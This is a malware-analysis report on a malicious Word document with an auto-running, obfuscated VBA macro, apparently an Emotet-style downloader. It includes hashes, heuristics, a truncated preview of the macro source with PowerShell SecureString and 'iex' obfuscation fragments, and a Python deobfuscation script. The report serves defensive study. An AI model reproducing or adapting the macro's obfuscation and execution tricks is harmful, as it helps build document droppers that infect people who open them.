Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c657da632b79f66…

MALICIOUS

Office (OLE)

Size: 198.0 KB
Created: 2018-03-26 15:42:00 (OLE metadata timestamp, attacker-controlled; do not treat as a build or campaign date)
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 6e7b5168229d9d51a93b7f0eda42eaa8
SHA-1: b77975d9c2bf5f253af24b66c8f9003696522e34
SHA-256: 9c657da632b79f66ee4d6a491597c858f510a41adc2bea2ea407b18a1060a209
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information

The sample is a Word document whose VBA project runs on open (AutoOpen) and calls CreateObject. The recovered source (macros.bas, below) is heavily obfuscated: every meaningful string is passed through a wrapper, DkKHRE(s, start, length), that behaves like VBA Mid() and strips junk characters from both ends of the literal, and the real statements are buried between arithmetic and Set assignments that do nothing. The fragments that survive the wrapper are pieces of a PowerShell command: a case-mangled `...Services.Marshal]::SecureStringToGlobalAllocUnicode(` call, a string beginning with 76492d1116743f0423413b16050a5345 (the header that PowerShell's ConvertFrom-SecureString -Key writes in front of its base64 envelope), and the idiom (gv '*mDr*').name[3,11,2]-jOin'', which resolves to iex by indexing into the automatic variable name MaximumDriveCount. Together with ClamAV's 'Emodldr' name, this is consistent with an Emotet-style document downloader that decrypts its second-stage PowerShell from SecureString blobs and runs it with Invoke-Expression. The decryption key, the downloaded payload and its URL are not visible in the truncated preview and are not claimed here.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium] 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro: the code runs as soon as the document is opened with macros enabled, without any further user action
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call: the macro instantiates a COM object at run time (the object type is not visible in the truncated preview below)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose macro exists only as p-code, or whose source extraction failed, so that no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic wording ("no modern VBA project was recovered and no stronger macro-virus family marker was present") does not hold for this sample, where a VBA project was recovered (macros.bas below); treat this hit as corroborating the auto-execution surface, not as a downloader or parser-CVE attribution in itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI and appears in any document carrying DrawingML content; it is not an indicator of compromise and should not be blocked or hunted for.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25223 bytes
SHA-256: 7f28f0fef448469ac4593fd0f90342f4b7097241560d720ac7356cd8a58527ff
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s). Each blob is wrapped in junk characters and sliced at run time by DkKHRE(s, start, length), a Mid()-style helper (for example, the literal passed with start 5 and length 171 in the preview loses a 4-character prefix and a 3-character suffix), and the blobs appear to be chunks of one longer base64 string rather than independent encodings: individual chunks do not decode to readable text on their own. Decode them only after stripping the wrapper and joining them in the order the macro uses.
Preview of the extracted script (first 1,000 lines; truncated below)
Attribute VB_Name = "SGUMkpLwO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wsPkwRj"
Function whmrdTP()
On Error Resume Next
Set WwcwwZ = IjDcw
FqwUvu = 8213 + 3324
OModSX = 58869 / mBaphM
OjHQchzj = DkKHRE("ABrrUUADQAOAA2AGMAOQA5ADEAZgA4AGUAYgA3AGYAYwBmADYAOQBhADEAYQAxADcAYgAzAGMAOQAyADgAMgAyAGQAZgBiAGEAMQAzADkAMwAzAGQAMgAyADgANgBhAGUANAA5AGEAOQA2ADkANQBjADgAOQBhAGQAOAA3ADMANgAzADYAYQAzADAAMABhADQAMgA3A3 ", 7, 193)
Set fYbtFM = NEPiMf
Aaiji = 64001 + 30650
SHAiB = 32736 / XAXiOo
Set CBCvhC = CTnjVG
JEShh = 5528 + 40651
lMzcW = 61137 / cRkuQ
MwbOQIHO = DkKHRE("BiSgA0ADIAZQBhAGEAZQA4AGUAMwA0ADMANwBmADQANAAzADcAMAA1ADIANwA4ADkANwA0AGUANwBkAGEAZgBjADMAMQBhADMAMABhADgAZABkCwlwp", 4, 107)
Set wPZlh = AfutMv
KQAVjw = 58722 + 96425
qwFfG = 87552 / VwapwN
Set OIwjF = zzGCP
LpIiP = 91988 + 81730
zNvaL = 68681 / EXGarX
AsRlwpt = DkKHRE("TSTiADIANQAwADEAOAA0ADgANgBmAGQANAA1ADQAZABlAGUAZQA1ADUAYgAwADYAMQA0ADAAZgBkAGQAMgA3ADAAMQAyADgAYgA0AGUAZgA3ADcAiUQX", 4, 109)
Set DHBXI = WZsZO
GjNoI = 62845 + 99565
FAMVX = 42443 / tbAcXr
Set aWEVft = bFpNM
RMFFYr = 34530 + 37051
DQojX = 97619 / PVhGd
HUYlrXttDci = DkKHRE("SDQANQAxAGEAMgBiAGIAOQA0AGEANwA5AGEAMwA2ADcAMAA5ADcANQA1ADAANABlAGEAOQBkAGUAZgA1ADgANAA3ADMANwBlAGYAMQA5ADMAZgBhADcAOQBmADMAOAA5ADIAMQA4AGMAMQA0ADUAZQAzADYAOAAyADQAZAAwADYANwAxADUANAAxADIANQAwAGQANiN1Whu", 2, 196)
Set LBfMI = cVmMIs
FZXIJ = 12772 + 54303
TnhwW = 27912 / pUjFP
Set qizLi = QhKYz
zuiXA = 55021 + 47887
fDLYr = 76432 / iEqJiw
fzrlrrpMrG = DkKHRE("sd.N.GIAYQAxAGUAYwA2AGYAMQA5ADAAMwA1AGIANQA3ADQANQA0ADIAMwA0ADQANAA1ADQAMQA1AGEAOAAwADUAMgAwADYANwBiADAAOAAxADkAYwA4AGUAZgBhADAAOQAXTw", 6, 126)
Set TMckOz = Woziw
uwVQV = 96515 + 93724
mTYTuX = 72848 / TPPQJa
Set fLViI = ZszrLA
IkTFZF = 69486 + 5119
cjLdh = 933 / FSEkU
LbcdSs = DkKHRE("USVNSerVICEs.MArSHal]::SEcureStrinGtOgLObalalLocunIcode( $('76492d1116743f0423413b16050a5345MgB8ADAAbQBPAEgAbQBhADcAawBMAFMANwAxAGUAeAB1AGkAZwBaAGQAawBVAHcAPQA9AHwAMAAyADMAZAASYw", 5, 171)
Set UsSlpR = wEoNU
usMsv = 46893 + 44145
ipWfD = 47367 / sZGPGL
Set WiGWi = GXjwaT
jkuDc = 99801 + 87142
UzjFiS = 75552 / ahqDf
WlopWJM = DkKHRE("B@iGYANwA5ADIAMwBlAGEAYgA4ADMANAAxADAAZQAxADMAMwAzADMAYgBkADYAYwBmADYANgBkADMAYgA1ADcAMAAzADUAYwA3AGYAZgAxAGYANABlAGQAYwAxAtqsP", 4, 120)
Set SwmvCR = zizBK
ZFric = 22177 + 70676
faRzJ = 36771 / JOkPYD
Set wWcIU = toNJtO
jajfK = 53450 + 10244
zUbvnE = 94680 / TDmOE
wzwCsiaqlI = DkKHRE("hUO.QQUkADQAMgA4ADEAZABlADUAMQA0AGQAOQA2ADYAMQA3ADEAMABlAGEAYQBkADMAYwBiADIAZABiADcAMgA2AGQANgAxAGMAMwBkAGMANABmAGMAMwAxADcAMQA0ADMAYgBiADQAYwAzADkAYwA0ADQANQA3ADMAYwAyADYANQAyADMAOQA2AGYAZABmADEAMQA3ADcaj", 8, 196)
Set JwnRMk = SmYDj
hdcwH = 6609 + 95262
CBNjmv = 36723 / FGzCBQ
Set zDLYJL = iqPhw
KSuBD = 81349 + 17280
Phvdj = 57996 / tnMPBX
zhzbpQzCQr = DkKHRE("@TWOABjAGUAZQAyAGYANQAwADgAOQBhAGUAYgA0ADUANgBhADcAMAAxAGUANgBkAGMANgAzADAANgA4ADIANgBhADEAMQAzADkANQA0AGQAMABjADcANAAxAGQAYgA5AGGM", 5, 125)
Set OwRWZl = tYwZt
oJmYpI = 37386 + 66432
Qvdja = 78203 / CSviW
Set fCDpZ = HlbfzZ
qDAXzh = 50725 + 95323
ONwfC = 36024 / uuZfEj
TSwnQYzwTS = DkKHRE("WBJGQAOQBhAGYAMgBiAGMAOQBmADYAZAAwADAANgBmADEAZAAxADAAZgBkADEAMgBlADQRQLko", 4, 66)
Set VXvqfi = wdwjIs
kmLEQO = 76674 + 80459
umouhl = 47129 / oJSfzC
Set WcYrFL = lthvjr
ETTji = 10838 + 50714
NcoowO = 58648 / FQBOUt
FopjzdR = DkKHRE("0I7.,)|.((gv '*mDr*').name[3,11,2]-jOin'')Yvi", 6, 37)
Set bvbbpI = iQPmvE
oLLMc = 28892 + 93212
RMOHt = 52787 / hdnLrr
Set ctlOS = RpfrM
CztrN = 34553 + 44279
pOpHm = 24179 / QtYiz
ZHRGPooFs = DkKHRE("2NPWWZgA3ADYAYwA4ADMANgA3AGUAYgA2ADYAOQAzADAANgA4ADIAZQA1ADMAMwBlAGYAMgAzADgANgBhAGEANQAyADUAYQAwADcAZgAyADAAMgBiAGUAMgA2ADAAZgAxADQANABhAGMAYgBhADIAYwAw@W", 6, 148)
Set jkZYcz = EwIzZ
jNoYm = 82204 + 8475
MNEdcF = 63728 / vHJMH
Set HzOIz = RuiafV
OHFTjQ = 86573 + 75048
hDGYcE = 40343 / MlwHh
HPkp
... (truncated)
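The wrapper-stripping step described in the summary and the blob caveat in the artifact record, as an added worked example (this script is not part of the report, of oletools, or of the sample): it applies Mid() semantics to every DkKHRE("...", start, length) call, decodes the UTF-16LE base64 envelope that follows the 76492d1116743f0423413b16050a5345 header, and resolves the (gv '*mDr*').name[3,11,2]-jOin'' idiom against a small constructed table of PowerShell automatic variables. The three DkKHRE lines embedded in SAMPLE_VBA are copied from the preview above; KNOWN_VARIABLES, the function names and the regular expressions are the example's own assumptions, not anything the sample or the tooling defines.

```python
"""Strip the Mid()-style wrapper from the DkKHRE(...) calls in the carved macro
and look at what falls out. Added example, not code from the report or the sample."""
import base64
import fnmatch
import re

# Constructed input: three DkKHRE() lines copied verbatim from the macro preview.
SAMPLE_VBA = r'''
LbcdSs = DkKHRE("USVNSerVICEs.MArSHal]::SEcureStrinGtOgLObalalLocunIcode( $('76492d1116743f0423413b16050a5345MgB8ADAAbQBPAEgAbQBhADcAawBMAFMANwAxAGUAeAB1AGkAZwBaAGQAawBVAHcAPQA9AHwAMAAyADMAZAASYw", 5, 171)
TSwnQYzwTS = DkKHRE("WBJGQAOQBhAGYAMgBiAGMAOQBmADYAZAAwADAANgBmADEAZAAxADAAZgBkADEAMgBlADQRQLko", 4, 66)
FopjzdR = DkKHRE("0I7.,)|.((gv '*mDr*').name[3,11,2]-jOin'')Yvi", 6, 37)
'''

# Header that ConvertFrom-SecureString -Key writes in front of its base64 envelope.
SECURESTRING_MAGIC = "76492d1116743f0423413b16050a5345"
SECURESTRING_RUN = re.compile(re.escape(SECURESTRING_MAGIC) + r"([A-Za-z0-9+/]+=*)")

# (gv '*pat*').name[i,j,k]-join''  builds a word out of an automatic variable's name.
GV_TRICK = re.compile(r"\(\s*gv\s+'([^']*)'\s*\)\.name\[([\d,\s]+)\]\s*-join\s*''", re.I)

# Constructed table of PowerShell automatic/preference variables the trick usually
# targets. For a real case, dump Get-Variable on a clean host of the same version.
KNOWN_VARIABLES = ["MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
                   "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount",
                   "PSHOME", "ShellId", "VerbosePreference"]


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` chars, '' once start is past the end."""
    if start < 1 or length < 0:
        raise ValueError("Mid() needs start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def extract_fragments(vba_source, wrapper="DkKHRE"):
    """Cleaned string of every `var = wrapper("...", start, length)` call, in source order."""
    call = re.compile(r'\w+\s*=\s*' + re.escape(wrapper)
                      + r'\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)')
    # VBA escapes a quote inside a literal by doubling it.
    return [vba_mid(m.group(1).replace('""', '"'), int(m.group(2)), int(m.group(3)))
            for m in call.finditer(vba_source)]


def decode_securestring_envelope(text):
    """Decode the UTF-16LE base64 that follows the magic header.

    Returns the 'version|IV-base64|ciphertext-hex' envelope (truncated when the
    fragment ends mid-string) or None. The AES key is NOT in here; it is the -Key
    argument handed to ConvertTo-SecureString elsewhere in the script."""
    m = SECURESTRING_RUN.search(text)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # restore stripped padding
    return raw[: len(raw) & ~1].decode("utf-16-le", errors="replace")


def resolve_gv_trick(text, variables=KNOWN_VARIABLES):
    """Resolve (gv '*pat*').name[i,j,k]-join'' to (variable, built_word), or None.

    Refuses to guess when the wildcard matches several variables."""
    m = GV_TRICK.search(text)
    if not m:
        return None
    pattern = m.group(1).lower()                      # PowerShell wildcards are case-insensitive
    indices = [int(i) for i in m.group(2).split(",")]
    hits = [v for v in variables if fnmatch.fnmatchcase(v.lower(), pattern)]
    if len(hits) != 1:
        raise ValueError(f"wildcard {pattern!r} matched {hits}; not resolving")
    return hits[0], "".join(hits[0][i] for i in indices)


def triage(vba_source):
    """Run all three steps and collect the findings an analyst would log."""
    frags = extract_fragments(vba_source)
    return {
        "fragments": frags,
        "securestring": next((decode_securestring_envelope(f) for f in frags
                              if SECURESTRING_MAGIC in f), None),
        "gv_trick": next((resolve_gv_trick(f) for f in frags if GV_TRICK.search(f)), None),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run against the three sample lines, the first fragment yields the envelope `2|0mOHma7kLS71exuigZdkUw==|023d...`: version 2, a 16-byte IV, then the start of the hex ciphertext that continues in other blobs. The third fragment resolves to `iex`. The second fragment is a mid-string chunk of base64 and decodes to nothing readable on its own, which is the point of the caveat in the artifact record: join the chunks in the macro's order before decoding, and expect to need the -Key bytes from the rest of the script before any of it decrypts.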